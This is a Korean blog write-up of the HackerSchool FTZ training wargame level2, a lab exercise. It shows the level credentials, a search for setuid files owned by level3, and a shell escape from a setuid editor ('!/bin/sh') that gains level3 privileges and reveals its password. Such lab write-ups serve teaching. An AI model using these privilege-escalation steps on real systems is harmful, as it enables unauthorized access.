id:
level2
passwd:
hacker or cracker
ls -al
cat hint
힌트를 살펴보자
편집이 가능하고 실행이 가능하므로 4300
기존과 같이 level3의 권한을 사용할 수 있는것을 확인했다.
find / -user level3 -perm -4300
/usr/bin/editor 에서 level3의 권한을 사용할 수 있는 것을 확인함
또는
find / -user level3 -perm -4300 2 > /dev/null
/usr/bin/editor
파일 설명자설명
2 > /dev/null
표준 오류(진단) 출력
표준 오류 출력만 무시하는 경우
cd /usr/bin/
./editor
:!/bin/sh
에디터에서 쉘을 획득하기위해 실행한다.
level3 권한으로 쉘권한을 획득함
my-pass
명령을 실행함.
level3의 패스워드를 확인가능했다
level3 passwd
can you fly?
'시스템 해킹' 카테고리의 다른 글
| dreamhack wargame -1 (0) | 2024.05.25 |
|---|---|
| HackerSchool FTZ - 3 (0) | 2024.05.23 |
| HackerSchool FTZ - 1 (0) | 2024.05.23 |
| HackerSchool FTZ trainning 전체 (0) | 2024.05.23 |
| 포멧스트링 버그 - 데이터쓰기 (0) | 2024.05.19 |